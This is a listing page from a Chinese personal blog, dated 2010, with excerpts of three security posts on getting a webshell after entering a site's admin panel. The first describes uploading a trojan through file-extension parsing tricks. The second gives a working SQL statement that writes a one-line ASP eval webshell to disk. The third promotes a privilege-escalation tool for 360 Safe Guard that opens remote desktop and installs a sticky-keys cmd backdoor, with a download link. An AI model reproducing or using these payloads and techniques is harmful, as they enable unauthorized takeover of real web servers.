小健博客网络技术综合大全

进入后台后怎样得到webshell

小健 发表于 安全 | 2010年7月19日 21:26:25
评论:(0)

一、直接上传获得webshell

  有些程序的后台上传文件格式没有限死,比如一些ASA,CER没有限制,又或者利用1.asp;1.jpg这种格式,或者1.asp/1.jpg  这里的1.asp 是文件夹,我直接上传这种格式的木马就可以了。
...

利用后台的SQL执行命令功能导出WebShell

小健 发表于 安全 | 2010年6月16日 15:03:10
评论:(1)

   今天进了一个网站的后台,发现没有任何可利用的地方,只有一个SQL高级助手,而且有一个站点物理路径,而且这套程序网上是开源的,我知道数据库的表名,于是想到了利用Access导出WebShell,方法如下:

SELECT '<%execute request("z")%>' into [a] in 'c:\z.asp;z.xls' 'excel 8.0;' from a

...

360安全卫士本地提权漏洞webshell利用工具(图解)

小健 发表于 安全 | 2010年5月3日 13:01:27
评论:(0)

首先声明:由于需要本地权限,对个人用户不会造成影响,危害也不是大范围的,只对某些安装360安全卫士的服务器有影响。

本工具需要Wscript.shell支持,只需要guests 权限即可运行。

1.开启终端服务,端口为3389;用法:360.exe port

2.替换5下shift为cmd;用法:360.exe sethc

360.exe 下载  http://www.xiaojian.org/upload/201005031353102480.rar

...
分页:[«]1[»]
up